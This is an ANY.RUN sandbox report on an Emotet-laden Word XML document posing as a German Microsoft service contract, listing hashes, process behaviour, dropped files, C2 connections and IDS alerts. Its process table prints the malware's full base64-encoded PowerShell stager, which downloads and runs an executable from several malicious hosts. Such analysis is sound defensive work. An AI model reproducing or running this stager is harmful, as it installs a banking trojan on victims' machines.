analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Microsoft_Servicevertrag_2019.doc

Full analysis: https://app.any.run/tasks/a4fd465e-1a78-4cd8-ade2-2aa266431fd3
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: February 11, 2019, 08:27:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
emotet
trojan
feodo
Indicators:
MIME: text/xml
File info: XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
MD5:

0335C9517F0C3B482AD247A01F7E2E9B

SHA1:

7074C02B2DAE3231720F55FB3695431FAC5D71BE

SHA256:

D0461BD5B8430CB91B6C62A3DBEB501AA9C9CB78E74DF1D12A1203990D424C85

SSDEEP:

6144:bp2ppO0A4z+ihMzSVIhl9EKRDqME4yanMjdn/NQVg+D3Do8oRtxQwvVAJTVa:bkzpcih8SVIf51E4K14o8Iue

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2708)
    • Executes PowerShell scripts

      • WINWORD.EXE (PID: 2708)
    • Request from PowerShell which ran from Office

      • POwershell.exe (PID: 3856)
    • Application was dropped or rewritten from another process

      • 293.exe (PID: 2788)
      • 293.exe (PID: 3964)
      • wabmetagen.exe (PID: 2312)
      • wabmetagen.exe (PID: 972)
    • Emotet process was detected

      • wabmetagen.exe (PID: 2312)
    • Downloads executable files from the Internet

      • POwershell.exe (PID: 3856)
    • EMOTET was detected

      • wabmetagen.exe (PID: 972)
    • Changes the autorun value in the registry

      • wabmetagen.exe (PID: 972)
    • Connects to CnC server

      • wabmetagen.exe (PID: 972)
  • SUSPICIOUS

    • Starts Microsoft Office Application

      • MSOXMLED.EXE (PID: 2972)
    • Creates files in the user directory

      • POwershell.exe (PID: 3856)
    • Executable content was dropped or overwritten

      • POwershell.exe (PID: 3856)
      • 293.exe (PID: 2788)
    • Starts itself from another location

      • 293.exe (PID: 2788)
    • Connects to unusual port

      • wabmetagen.exe (PID: 972)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2708)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 2708)
    • Dropped object may contain Bitcoin addresses

      • POwershell.exe (PID: 3856)
      • 293.exe (PID: 2788)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.xml | Microsoft Office XML Flat File Format Word Document (ASCII) (65.1)
.xml | Microsoft Office XML Flat File Format (ASCII) (31)
.xml | Generic XML (ASCII) (2.3)
.html | HyperText Markup Language (1.4)

EXIF

XMP

WordDocumentBodySectSectPrDocGridLine-pitch: 360
WordDocumentBodySectSectPrColsSpace: 720
WordDocumentBodySectSectPrPgMarGutter: -
WordDocumentBodySectSectPrPgMarFooter: 720
WordDocumentBodySectSectPrPgMarHeader: 720
WordDocumentBodySectSectPrPgMarLeft: 1440
WordDocumentBodySectSectPrPgMarBottom: 1440
WordDocumentBodySectSectPrPgMarRight: 1440
WordDocumentBodySectSectPrPgMarTop: 1440
WordDocumentBodySectSectPrPgSzH: 15840
WordDocumentBodySectSectPrPgSzW: 12240
WordDocumentBodySectSectPrRsidR: 005E6EE1
WordDocumentBodySectPRPictShapeImagedataTitle: -
WordDocumentBodySectPRPictShapeImagedataSrc: wordml://QAU28z.oXhqLV.SKISBk9u
WordDocumentBodySectPRPictShapeStyle: width:468pt;height:349.5pt;visibility:visible;mso-wrap-style:square
WordDocumentBodySectPRPictShapeType: #_x0000_t75
WordDocumentBodySectPRPictShapeSpid: _x0000_i1025
WordDocumentBodySectPRPictShapeId: Picture 1
WordDocumentBodySectPRPictBinData: (Binary data 366950 bytes, use -b option to extract)
WordDocumentBodySectPRPictBinDataName: wordml://QAU28z.oXhqLV.SKISBk9u
WordDocumentBodySectPRPictShapetypeLockAspectratio: t
WordDocumentBodySectPRPictShapetypeLockExt: edit
WordDocumentBodySectPRPictShapetypePathConnecttype: rect
WordDocumentBodySectPRPictShapetypePathGradientshapeok: t
WordDocumentBodySectPRPictShapetypePathExtrusionok: f
WordDocumentBodySectPRPictShapetypeFormulasFEqn: if lineDrawn pixelLineWidth 0
WordDocumentBodySectPRPictShapetypeStrokeJoinstyle: miter
WordDocumentBodySectPRPictShapetypeStroked: f
WordDocumentBodySectPRPictShapetypeFilled: f
WordDocumentBodySectPRPictShapetypePath: m@4@5l@4@11@9@11@9@5xe
WordDocumentBodySectPRPictShapetypePreferrelative: t
WordDocumentBodySectPRPictShapetypeSpt: 75
WordDocumentBodySectPRPictShapetypeCoordsize: 21600,21600
WordDocumentBodySectPRPictShapetypeId: _x0000_t75
WordDocumentBodySectPRRPrNoProof: -
WordDocumentBodySectPRRsidRPr: 00856E4F
WordDocumentBodySectPRsidRDefault: 000370E0
WordDocumentBodySectPRsidR: 005E6EE1
WordDocumentDocPrRsidsRsidVal: 000370E0
WordDocumentDocPrRsidsRsidRootVal: 005E6EE1
WordDocumentDocPrCompatDontGrowAutofit: -
WordDocumentDocPrCompatUseAsianBreakRules: -
WordDocumentDocPrCompatWrapTextWithPunct: -
WordDocumentDocPrCompatSnapToGridInCell: -
WordDocumentDocPrCompatBreakWrappedTables: -
WordDocumentDocPrAlwaysShowPlaceholderTextVal: off
WordDocumentDocPrIgnoreMixedContentVal: off
WordDocumentDocPrSaveInvalidXMLVal: off
WordDocumentDocPrValidateAgainstSchema: -
WordDocumentDocPrPixelsPerInchVal: 120
WordDocumentDocPrOptimizeForBrowser: -
WordDocumentDocPrCharacterSpacingControlVal: DontCompress
WordDocumentDocPrPunctuationKerning: -
WordDocumentDocPrDefaultTabStopVal: 720
WordDocumentDocPrDoNotEmbedSystemFonts: -
WordDocumentDocPrRemovePersonalInformation: -
WordDocumentDocPrZoomPercent: 100
WordDocumentDocPrViewVal: print
WordDocumentShapeDefaultsShapelayoutIdmapData: 1
WordDocumentShapeDefaultsShapelayoutIdmapExt: edit
WordDocumentShapeDefaultsShapelayoutExt: edit
WordDocumentShapeDefaultsShapedefaultsSpidmax: 1026
WordDocumentShapeDefaultsShapedefaultsExt: edit
WordDocumentDocSuppDataBinData: (Binary data 75928 bytes, use -b option to extract)
WordDocumentDocSuppDataBinDataName: YWoY9D1
WordDocumentStylesStyleRPrRFontsCs: Tahoma
WordDocumentStylesStyleRPrRFontsH-ansi: Tahoma
WordDocumentStylesStyleRPrRFontsAscii: Tahoma
WordDocumentStylesStyleRsidVal: 005A24B1
WordDocumentStylesStyleLinkVal: BalloonTextChar
WordDocumentStylesStyleBasedOnVal: Normal
WordDocumentStylesStyleTblPrTblCellMarRightType: dxa
WordDocumentStylesStyleTblPrTblCellMarRightW: 108
WordDocumentStylesStyleTblPrTblCellMarBottomType: dxa
WordDocumentStylesStyleTblPrTblCellMarBottomW: -
WordDocumentStylesStyleTblPrTblCellMarLeftType: dxa
WordDocumentStylesStyleTblPrTblCellMarLeftW: 108
WordDocumentStylesStyleTblPrTblCellMarTopType: dxa
WordDocumentStylesStyleTblPrTblCellMarTopW: -
WordDocumentStylesStyleTblPrTblIndType: dxa
WordDocumentStylesStyleTblPrTblIndW: -
WordDocumentStylesStyleUiNameVal: Table Normal
WordDocumentStylesStyleRPrLangBidi: AR-SA
WordDocumentStylesStyleRPrLangFareast: EN-US
WordDocumentStylesStyleRPrLangVal: EN-US
WordDocumentStylesStyleRPrSz-csVal: 22
WordDocumentStylesStyleRPrSzVal: 22
WordDocumentStylesStyleRPrFontVal: Calibri
WordDocumentStylesStylePPrSpacingLine-rule: auto
WordDocumentStylesStylePPrSpacingLine: 259
WordDocumentStylesStylePPrSpacingAfter: 160
WordDocumentStylesStyleNameVal: Normal
WordDocumentStylesStyleStyleId: Normal
WordDocumentStylesStyleDefault: on
WordDocumentStylesStyleType: paragraph
WordDocumentStylesLatentStylesLsdExceptionName: Normal
WordDocumentStylesLatentStylesLatentStyleCount: 375
WordDocumentStylesLatentStylesDefLockedState: off
WordDocumentStylesVersionOfBuiltInStylenamesVal: 7
WordDocumentFontsFontSigCsb-1: 00000000
WordDocumentFontsFontSigCsb-0: 000001FF
WordDocumentFontsFontSigUsb-3: 00000000
WordDocumentFontsFontSigUsb-2: 00000009
WordDocumentFontsFontSigUsb-1: C0007841
WordDocumentFontsFontSigUsb-0: E0002AFF
WordDocumentFontsFontPitchVal: variable
WordDocumentFontsFontFamilyVal: Roman
WordDocumentFontsFontCharsetVal: 00
WordDocumentFontsFontPanose-1Val: 02020603050405020304
WordDocumentFontsFontName: Times New Roman
WordDocumentFontsDefaultFontsCs: Times New Roman
WordDocumentFontsDefaultFontsH-ansi: Calibri
WordDocumentFontsDefaultFontsFareast: Calibri
WordDocumentFontsDefaultFontsAscii: Calibri
WordDocumentDocumentPropertiesVersion: 16
WordDocumentDocumentPropertiesCharactersWithSpaces: 1
WordDocumentDocumentPropertiesParagraphs: 1
WordDocumentDocumentPropertiesLines: 1
WordDocumentDocumentPropertiesCharacters: 1
WordDocumentDocumentPropertiesWords: -
WordDocumentDocumentPropertiesPages: 1
WordDocumentDocumentPropertiesLastSaved: 2019:02:11 07:32:00Z
WordDocumentDocumentPropertiesCreated: 2019:02:11 07:32:00Z
WordDocumentDocumentPropertiesTotalTime: -
WordDocumentDocumentPropertiesRevision: 1
WordDocumentIgnoreSubtreeVal: http://schemas.microsoft.com/office/word/2003/wordml/sp2
WordDocumentOcxPresent: no
WordDocumentEmbeddedObjPresent: no
WordDocumentMacrosPresent: yes
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
7
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start msoxmled.exe no specs winword.exe no specs powershell.exe 293.exe no specs 293.exe #EMOTET wabmetagen.exe no specs #EMOTET wabmetagen.exe

Process information

PID
CMD
Path
Indicators
Parent process
2972"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXE" /verb open "C:\Users\admin\AppData\Local\Temp\Microsoft_Servicevertrag_2019.doc.xml"C:\Program Files\Common Files\Microsoft Shared\OFFICE14\MSOXMLED.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
XML Editor
Exit code:
0
Version:
14.0.4750.1000
2708"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Microsoft_Servicevertrag_2019.doc.xml"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEMSOXMLED.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3856POwershell -e JAB0AGkATgA3AFEAagAwAD0AKAAnAHEAWQAzACcAKwAnAEcAJwArACcAaQBHAGoAUgAnACkAOwAkAEkAVABJADcAQwBBAFgAPQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAVgBYADQAUABOAGEAPQAoACcAaAAnACsAJwB0AHQAcAAnACsAJwA6AC8ALwAnACsAJwBwAHMAaQBfAHQAZQBzAHQALgBmACcAKwAnAGEAcgAnACsAJwBzAGUAYQAnACsAJwBzACcAKwAnAHQAeQAuAGMAbwBtAC8AOQAnACsAJwBTAFMANwBqACcAKwAnADUAJwArACcAMQAnACsAJwBxACcAKwAnAEAAaAAnACsAJwB0ACcAKwAnAHQAcAA6AC8AJwArACcALwAnACsAJwBqAHUAcwAnACsAJwB0AGMAbAAnACsAJwBpAGMAawBtACcAKwAnAGUAZABpAGEALgBjAG8AbQAvAFEAbwBYAEYAYQBoADUAQABoAHQAdAAnACsAJwBwADoALwAvAGcAbABvAHIAJwArACcAaQBhAGwAbwByAGkAbgBnAC4AJwArACcAYwBvAG0AJwArACcALwAwACcAKwAnAFkANwAnACsAJwB3ACcAKwAnADcAdAB4AEQARQBWAEAAaAAnACsAJwB0AHQAcAA6ACcAKwAnAC8ALwBhAHAAbwB0ACcAKwAnAGgAZQBlACcAKwAnAGsALQB2AG8AbABsAGUAbgAnACsAJwBoACcAKwAnAG8AJwArACcAdgBlAC4AbgBsAC8AJwArACcAQQAnACsAJwBzADkAJwArACcAeQA0AEoAUgBAACcAKwAnAGgAdAB0ACcAKwAnAHAAOgAvAC8AcwB5AG0AYgBpAHMAeQBzAHQAZQBtAHMALgAnACsAJwBjACcAKwAnAG8AbQAnACsAJwAvAEMASgB0AGYAawAwADEAeABGACcAKQAuAFMAcABsAGkAdAAoACcAQAAnACkAOwAkAGIAMwA2AGIAagA4AGsASwA9ACgAJwBNAHYAaQAnACsAJwBuAGQAZgBYACcAKQA7ACQAdwBWAFUAWgBzADIATgAgAD0AIAAoACcAMgA5ACcAKwAnADMAJwApADsAJAByADMASQBCADkAUgBrADIAPQAoACcAdQAnACsAJwBhADcAYgBRAHAAJwApADsAJABaAEYASQBaADIAaQA5AHoAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAHcAVgBVAFoAcwAyAE4AKwAoACcALgBlAHgAJwArACcAZQAnACkAOwBmAG8AcgBlAGEAYwBoACgAJABKADcANwBuAHYAYgBCACAAaQBuACAAJABWAFgANABQAE4AYQApAHsAdAByAHkAewAkAEkAVABJADcAQwBBAFgALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQASgA3ADcAbgB2AGIAQgAsACAAJABaAEYASQBaADIAaQA5AHoAKQA7ACQAagA5AHAAWQBJAHcAPQAoACcAcgBPAG4ARAB0ACcAKwAnAE8AJwApADsASQBmACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgACQAWgBGAEkAWgAyAGkAOQB6ACkALgBsAGUAbgBnAHQAaAAgAC0AZwBlACAANAAwADAAMAAwACkAIAB7AEkAbgB2AG8AawBlAC0ASQB0AGUAbQAgACQAWgBGAEkAWgAyAGkAOQB6ADsAJAB6AHAAdAA1AGQAUAA9ACgAJwBVAG4AbgB3ACcAKwAnAHoASAAnACsAJwBXAHoAJwApADsAYgByAGUAYQBrADsAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGYATABNAGEAdABVAD0AKAAnAFgAVgBPAHQAJwArACcAaQAnACsAJwBwAFMANAAnACkAOwA=C:\Windows\System32\WindowsPowerShell\v1.0\POwershell.exe
WINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3964"C:\Users\admin\293.exe" C:\Users\admin\293.exePOwershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Exit code:
0
Version:
2001.12.4414.258
2788"C:\Users\admin\293.exe"C:\Users\admin\293.exe
293.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Exit code:
0
Version:
2001.12.4414.258
2312"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
293.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Exit code:
0
Version:
2001.12.4414.258
972"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe"C:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exe
wabmetagen.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
MS DTC transaction manager DLL
Version:
2001.12.4414.258
Total events
2 049
Read events
1 633
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
2708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVREB9C.tmp.cvr
MD5:
SHA256:
2708WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\19F6CF38.SKISBk9u
MD5:
SHA256:
3856POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\7SVHICAYCP3JTDDG57JO.temp
MD5:
SHA256:
2708WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:D8FD8B8FAC0DBDE7F68D50F5FC3BAA32
SHA256:4B94FC7B43771EB8BEA914AFF6A56E0164499257C8CC334774EC155AAD143E4A
2708WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$crosoft_Servicevertrag_2019.doc.xmlpgc
MD5:2206976662751097453273195EFB1862
SHA256:2333FCE9C84C96CCE509D267249707AB540D7F46E1C9FB8834F903EC43692175
3856POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF20f4f3.TMPbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
2788293.exeC:\Users\admin\AppData\Local\wabmetagen\wabmetagen.exeexecutable
MD5:C8B4DE54410F588655B8C54C929BD635
SHA256:91DB0DD9A5B8897230394F2CF2FA8B511380E596AAB95F5F0847AD24DC071B0B
3856POwershell.exeC:\Users\admin\293.exeexecutable
MD5:C8B4DE54410F588655B8C54C929BD635
SHA256:91DB0DD9A5B8897230394F2CF2FA8B511380E596AAB95F5F0847AD24DC071B0B
3856POwershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:2BCAD5DA21CB41B727ABDE7D6B6990B8
SHA256:AB1397E3A31059329829AE2164787589945B1459ED2E1B7328E86ED497A6F9F3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
6
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
972
wabmetagen.exe
GET
174.84.250.37:443
http://174.84.250.37:443/
US
malicious
3856
POwershell.exe
GET
200
103.96.72.146:80
http://psi_test.farseasty.com/9SS7j51q/
HK
executable
448 Kb
suspicious
3856
POwershell.exe
GET
301
103.96.72.146:80
http://psi_test.farseasty.com/9SS7j51q
HK
html
178 b
suspicious
972
wabmetagen.exe
GET
200
71.174.233.71:20
http://71.174.233.71:20/
US
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3856
POwershell.exe
103.96.72.146:80
psi_test.farseasty.com
Cloudie Limited
HK
malicious
972
wabmetagen.exe
174.84.250.37:443
US
malicious
972
wabmetagen.exe
187.131.137.216:50000
Uninet S.A. de C.V.
MX
malicious
972
wabmetagen.exe
71.174.233.71:20
MCI Communications Services, Inc. d/b/a Verizon Business
US
malicious
972
wabmetagen.exe
64.32.70.194:20
Compañía Dominicana de Teléfonos, C. por A. - CODETEL
DO
malicious
972
wabmetagen.exe
200.110.85.138:990
Telconet S.A
EC
malicious

DNS requests

Domain
IP
Reputation
psi_test.farseasty.com
  • 103.96.72.146
suspicious

Threats

PID
Process
Class
Message
3856
POwershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3856
POwershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3856
POwershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
972
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
972
wabmetagen.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
2 ETPRO signatures available at the full report
No debug info